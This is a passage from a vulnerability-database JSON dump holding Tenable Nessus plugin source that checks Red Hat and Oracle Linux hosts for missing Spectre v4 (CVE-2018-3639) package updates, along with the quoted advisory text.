value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7\\.3([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.3\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-3639\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2018:1636\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1636\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", reference:\"kernel-abi-whitelists-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", reference:\"kernel-doc-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"perf-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"perf-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"python-perf-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-514.48.5.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"3\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-514.48.5.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-02-01T01:49:35", "bulletinFamily": "scanner", "description": "An update for qemu-kvm is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor", "modified": "2020-02-02T00:00:00", "id": "REDHAT-RHSA-2018-1633.NASL", "href": "https://www.tenable.com/plugins/nessus/109995", "published": "2018-05-23T00:00:00", "title": "RHEL 7 : qemu-kvm (RHSA-2018:1633) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1633. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109995);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2019/10/24 15:35:44\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:1633\");\n script_xref(name:\"IAVA\", value:\"2018-A-0170\");\n\n script_name(english:\"RHEL 7 : qemu-kvm (RHSA-2018:1633) (Spectre)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for qemu-kvm is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639)\n\nNote: This is the qemu-kvm side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/ssbd\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:1633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3639\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-img\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:qemu-kvm-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1633\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"qemu-img-1.5.3-156.el7_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"qemu-kvm-1.5.3-156.el7_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"qemu-kvm-common-1.5.3-156.el7_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"qemu-kvm-debuginfo-1.5.3-156.el7_5.2\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"qemu-kvm-tools-1.5.3-156.el7_5.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu-img / qemu-kvm / qemu-kvm-common / qemu-kvm-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-02-01T01:33:18", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2018:1647 :\n\nAn update for java-1.7.0-openjdk is now available for Red Hat\nEnterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor", "modified": "2020-02-02T00:00:00", "id": "ORACLELINUX_ELSA-2018-1647.NASL", "href": "https://www.tenable.com/plugins/nessus/109980", "published": "2018-05-23T00:00:00", "title": "Oracle Linux 6 : java-1.7.0-openjdk (ELSA-2018-1647) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2018:1647 and \n# Oracle Linux Security Advisory ELSA-2018-1647 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109980);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:1647\");\n\n script_name(english:\"Oracle Linux 6 : java-1.7.0-openjdk (ELSA-2018-1647) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2018:1647 :\n\nAn update for java-1.7.0-openjdk is now available for Red Hat\nEnterprise Linux 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime\nEnvironment and the OpenJDK 7 Java Software Development Kit.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor's data cache even\nfor speculatively executed instructions that never actually commit\n(retire). As a result, an unprivileged attacker could use this flaw to\nread privileged memory by conducting targeted cache side-channel\nattacks. (CVE-2018-3639)\n\nNote: This is the OpenJDK side of the CVE-2018-3639 mitigation.\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response\nCenter) and Jann Horn (Google Project Zero) for reporting this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-May/007753.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.7.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/23\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-1.7.0.181-2.6.14.8.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-demo-1.7.0.181-2.6.14.8.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-devel-1.7.0.181-2.6.14.8.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.181-2.6.14.8.0.1.el6_9\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"java-1.7.0-openjdk-src-1.7.0.181-2.6.14.8.0.1.el6_9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2020-02-01T01:33:18", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2018:1633 :\n\nAn update for qemu-kvm is now available for Red Hat Enterprise Linux\n7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nKernel-based Virtual Machine (KVM) is a full virtualization solution\nfor Linux on a variety of architectures. The qemu-kvm packages provide\nthe user-space component for running virtual machines that use KVM.\n\nSecurity Fix(es) :\n\n* An industry-wide issue was found in the way many modern\nmicroprocessor designs have implemented speculative execution of Load\n& Store instructions (a commonly used performance optimization). It\nrelies on the presence of a precisely-defined instruction sequence in\nthe privileged code as well as the fact that memory read from address\nto which a recent memory write has occurred may see an older value and\nsubsequently cause an update into the microprocessor", "modified": "2020-02-02T00:00:00", "id": "ORACLELINUX_ELSA-2018-1633.NASL", "href": "https://www.tenable.com/plugins/nessus/109979", "published": "2018-05-23T00:00:00", "title": "Oracle Linux 7 : qemu-kvm (ELSA-2018-1633) (Spectre)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2018:1633 and \n# Oracle Linux Security Advisory ELSA-2018-1633 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109979);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2018-3639\");\n script_xref(name:\"RHSA\", value:\"2018:1633\");\n\n script_name(english:\"Oracle Linux 7 : qemu-kvm (ELSA-2018-1633) (Spectre)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n 